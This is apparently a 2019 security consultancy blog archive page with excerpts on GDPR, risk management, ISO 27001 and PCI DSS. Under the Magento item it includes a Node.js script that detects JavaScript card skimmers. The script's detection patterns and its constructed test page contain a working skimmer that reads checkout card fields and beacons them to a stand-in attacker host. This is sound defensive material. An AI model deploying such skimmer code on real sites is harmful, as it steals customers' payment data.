March 2019

  • GDPR – What’s the difference between personal data and sensitive personal data?

    There is some confusion about the difference between personal data and sensitive personal data, and even about whether ‘sensitive personal data’ still exists as a term!  So, let’s see if we can clarify the situation.  Under the old Data Protection Act 1998 (DPA 1998) there was a term ‘sensitive personal data’.  Under the GDPR […]

  • Tips from URM – Three tips to help you simplify your risk management process

    A key role of risk management is helping organisations decide how limited resources can be most effectively used to address the most pressing business issues, e.g. threats to information security.  Where current resources are insufficient, risk management can help management decide on what extra budget or resources (including seeking help from third-party specialists) are required.  […]

  • How should you approach supply chain risk management?

    In our blog on risk management challenges for 2019, we referred to the perennial risk attached to suppliers, as third parties continue to be a major source of incidents.  Linked to the Brexit issue, understanding the risks your suppliers face and the measures they are taking to mitigate those risks is vital.  In this blog, […]

  • Magento attacks – most recent and historic

    One trend we are seeing in the market at present is an increase in the use of JavaScript Sniffers (JS Sniffers).  In short, these sniffers are malicious code injected into a website with the sole intention of stealing personal data, names, credentials etc. from customers using that website.  Most recently, […]
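    A JS sniffer of the kind described above has two tell-tale parts: it hooks the checkout form (or reads its inputs) and it sends what it collected to a host the shop does not control.  The following is an added example, not code from URM or from any of the Magento incidents mentioned; it is a Node.js script that statically scans a checkout page’s HTML, flags external scripts whose host is not on an allowlist, and flags inline scripts that combine a form-hooking indicator with an exfiltration indicator.  The allowlist hosts (`shop.example`, `cdn.example`), the sample page and the skimmer in it are all constructed for the example.

```javascript
// Added example: static scan of a checkout page for JS-sniffer indicators.
// Hosts the shop is known to load scripts from (assumption for this example).
const ALLOWED_SCRIPT_HOSTS = new Set(['shop.example', 'cdn.example']);

// Indicator patterns. A sniffer needs to read the form AND send it somewhere,
// so an inline script is only reported when both kinds of indicator appear.
const INDICATORS = [
  { name: 'form-hook',     re: /addEventListener\s*\(\s*['"]submit['"]|\bonsubmit\b|document\.forms/ },
  { name: 'input-harvest', re: /querySelectorAll\s*\(\s*['"]input|getElementsByTagName\s*\(\s*['"]input/ },
  { name: 'exfil',         re: /new\s+Image\s*\(|\.src\s*=\s*['"]https?:|XMLHttpRequest|\bfetch\s*\(|navigator\.sendBeacon/ },
  { name: 'obfuscation',   re: /\batob\s*\(|\bbtoa\s*\(|String\.fromCharCode|\\x[0-9a-f]{2}/i },
];

// Resolve a script src (absolute, protocol-relative or path-only) to a hostname.
function scriptHost(src, pageHost) {
  try {
    return new URL(src, `https://${pageHost}/`).hostname;
  } catch (e) {
    return null;
  }
}

// Returns a list of findings; an empty list means nothing suspicious was seen.
function analyzePage(html, pageHost, allowedHosts = ALLOWED_SCRIPT_HOSTS) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi; // fresh regex per call
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const src = attrs.match(/\bsrc\s*=\s*["']([^"']+)["']/i);
    if (src) {
      // External script: the only question is whether we trust the host.
      const host = scriptHost(src[1], pageHost);
      if (host === null) {
        findings.push({ kind: 'external', src: src[1], reason: 'unparseable src' });
      } else if (!allowedHosts.has(host)) {
        findings.push({ kind: 'external', src: src[1], reason: `host ${host} not on allowlist` });
      }
    } else {
      // Inline script: report only if it both harvests form data and exfiltrates.
      const hits = INDICATORS.filter((i) => i.re.test(body)).map((i) => i.name);
      const harvests = hits.includes('form-hook') || hits.includes('input-harvest');
      if (harvests && hits.includes('exfil')) {
        findings.push({ kind: 'inline', indicators: hits, snippet: body.trim().slice(0, 60) });
      }
    }
  }
  return findings;
}

// Constructed sample page (not taken from any real incident): a benign inline
// script, a legitimate first-party script, a rogue third-party script and an
// inline skimmer that hooks the checkout form and exfiltrates via an image beacon.
const SAMPLE_HTML = `
<html><body>
<script>window.dataLayer = window.dataLayer || [];</script>
<script src="https://shop.example/js/checkout.js"></script>
<script src="https://stats.evil-cdn.test/t.js"></script>
<form id="checkout"><input name="card"><input name="cvv"></form>
<script>
document.querySelector('#checkout').addEventListener('submit', function () {
  var d = '';
  document.querySelectorAll('input').forEach(function (i) { d += i.name + '=' + i.value + '&'; });
  var img = new Image();
  img.src = 'https://collect.evil-cdn.test/?d=' + btoa(d);
});
</script>
</body></html>`;

for (const f of analyzePage(SAMPLE_HTML, 'shop.example')) {
  console.log(JSON.stringify(f));
}
```

The check is deliberately conservative: a script is only reported when it both reads the form and has a way to send data out, so ordinary analytics snippets do not trip it.  It is a heuristic, and a sniffer that is heavily obfuscated or loaded from a compromised host already on the allowlist will not be caught by a scan of the page source alone; it complements, rather than replaces, a Content Security Policy that restricts `connect-src`, `img-src` and `form-action` to known hosts, Subresource Integrity on third-party scripts, and file-integrity monitoring of the store’s own JavaScript.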

  • Tips from URM – How can I demonstrate GDPR compliance?

    The easy way (if it was available!) would be to certify to an approved GDPR certification scheme.  The EU has stated that ‘Member states, supervisory authorities (such as the Information Commissioner’s Office in the UK), the European Data Protection Board (EDPB) and the Commission will promote certification as a means to enhance transparency and compliance […]

  • What are the ‘real world’ benefits of implementing ISO 27001?

    In a previous blog, we looked at ‘what is ISO27001 and why implement it’.  In this blog we want to dig a bit deeper on the benefits that are gained from implementing the standard and from achieving certification.  We could come up with a hypothetical list of benefits, but we thought it more beneficial to […]

  • Risk Management Challenges in 2019

    There has been a lot said and written about the risks businesses are expected to face in 2019, but less about the challenges of risk management and the process itself.  Here are our thoughts on what we see as the key challenges: Legislation/regulation and the impact on your risk tolerance – In 2018, we saw a […]

  • Tips from URM – Impact of Legislation/Regulation on your approach to risk

    Last year, we saw a significant advance in legislation/regulation surrounding data privacy and protection (e.g. the GDPR and the DPA 2018) and cyber security (e.g. the EU Network and Information Systems (NIS) Directive).  The new legislation will, undoubtedly, have an impact on your risk tolerance, and balancing your ‘position’ against the impact of such legislation/regulation will […]

  • PCI DSS V4.0 is on its way

    So, PCI DSS v4.0 has started its development journey and is expected to be released sometime in late 2020.  The actual release date will largely depend on the feedback received during the development review process.  So what is the development process?  From 6 September to 15 November 2017 (yes, 2017!!!), the PCI Security Standards Council offered […]